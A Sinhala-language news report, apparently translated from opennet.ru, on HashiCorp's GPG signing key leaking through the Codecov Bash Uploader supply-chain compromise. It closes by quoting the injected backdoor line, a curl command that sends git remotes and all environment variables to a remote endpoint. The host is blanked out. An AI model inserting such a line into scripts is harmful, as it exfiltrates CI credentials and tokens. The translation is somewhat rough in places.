විවෘත මූලාශ්ර මෙවලම් Vagrant, Packer, Nomad සහ Terraform සංවර්ධනය කිරීම සඳහා ප්රසිද්ධ HashiCorp, නිකුතු සත්යාපනය කරන ඩිජිටල් අත්සන් නිර්මාණය කිරීමට භාවිතා කරන පුද්ගලික GPG යතුර කාන්දු වීම නිවේදනය කළේය. GPG යතුර වෙත ප්රවේශය ලබා ගත් ප්රහාරකයන්ට නිවැරදි ඩිජිටල් අත්සනකින් සත්යාපනය කිරීමෙන් HashiCorp නිෂ්පාදනවලට සැඟවුණු වෙනස්කම් සිදු කළ හැකිය. ඒ අතරම, සමාගම ප්රකාශ කළේ විගණනයේදී එවැනි වෙනස් කිරීම් කිරීමට උත්සාහ කළ බවට කිසිදු හෝඩුවාවක් හඳුනා නොගත් බවයි.
දැනට, සම්මුතියට ලක් වූ GPG යතුර අවලංගු කර ඇති අතර ඒ වෙනුවට නව යතුරක් හඳුන්වා දී ඇත. ගැටලුව බලපෑවේ SHA256SUM සහ SHA256SUM.sig ගොනු භාවිතයෙන් සත්යාපනයට පමණක් වන අතර, releases.hashicorp.com හරහා සපයන ලද Linux DEB සහ RPM පැකේජ සඳහා ඩිජිටල් අත්සන් උත්පාදනයට බල නොපායි, මෙන්ම macOS සහ Windows සඳහා නිකුත් කරන සත්යාපන යාන්ත්රණ (AuthentiCode) .
අඛණ්ඩ ඒකාබද්ධතා පද්ධතිවලින් ආවරණ වාර්තා බාගත කිරීම සඳහා නිර්මාණය කර ඇති යටිතල පහසුකම් තුළ Codecov Bash Uploader (codecov-bash) ස්ක්රිප්ට් භාවිතය හේතුවෙන් කාන්දුව සිදු විය. Codecov සමාගමට එල්ල වූ ප්රහාරය අතරතුර, නිශ්චිත ස්ක්රිප්ටය තුළට පසුබිම් දොරක් සඟවා ඇති අතර, එමඟින් මුරපද සහ සංකේතාංකන යතුරු ප්රහාරකයන්ගේ සේවාදායකය වෙත යවන ලදී.
හැක් කිරීම සඳහා, ප්රහාරකයින් Codecov Docker රූපය නිර්මාණය කිරීමේ ක්රියාවලියේ ඇති වූ දෝෂයකින් ප්රයෝජන ගත් අතර, codecov.io වෙතින් බෙදා හරින ලද Bash Uploader ස්ක්රිප්ට් වෙත වෙනස්කම් කිරීමට අවශ්ය GCS (Google Cloud Storage) වෙත ප්රවේශ දත්ත උකහා ගැනීමට ඔවුන්ට ඉඩ ලබා දුන්නේය. වෙබ් අඩවිය. වෙනස්කම් ජනවාරි 31 වන දින නැවත සිදු කරන ලද අතර, මාස දෙකක් තිස්සේ අනාවරණය කර නොගත් අතර පාරිභෝගික අඛණ්ඩ ඒකාබද්ධතා පද්ධති පරිසරයන් තුළ ගබඩා කර ඇති තොරතුරු ලබා ගැනීමට ප්රහාරකයන්ට ඉඩ ලබා දුන්නේය. එකතු කරන ලද අනිෂ්ට කේතය භාවිතයෙන්, ප්රහාරකයින්ට පරීක්ෂා කරන ලද Git ගබඩාව සහ යෙදුම් කේතය, ගබඩාවන් සහ Amazon Web Services සහ GitHub වැනි සේවාවන් වෙත ප්රවේශය සංවිධානය කිරීම සඳහා අඛණ්ඩ ඒකාබද්ධතා පද්ධති වෙත සම්ප්රේෂණය කරන ලද ටෝකන, සංකේතාංකන යතුරු සහ මුරපද ඇතුළුව සියලුම පරිසර විචල්යයන් පිළිබඳ තොරතුරු ලබා ගත හැකිය.
සෘජු ඇමතුමට අමතරව, Codecov-action (Github), Codecov-circleci-orb සහ Codecov-bitrise-step වැනි අනෙකුත් උඩුගත කරන්නන්ගේ කොටසක් ලෙස Codecov Bash Uploader ස්ක්රිප්ට් භාවිතා කරන ලදී, එහි පරිශීලකයන් ද ගැටලුවෙන් පීඩාවට පත් වේ. codecov-bash සහ අදාළ නිෂ්පාදන භාවිතා කරන සියලුම පරිශීලකයින් ඔවුන්ගේ යටිතල පහසුකම් විගණනය කිරීමට මෙන්ම මුරපද සහ සංකේතාංකන යතුරු වෙනස් කිරීමට නිර්දේශ කරනු ලැබේ. රේඛා curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http:// /upload/v2 || සැබෑ
මූලාශ්රය: opennet.ru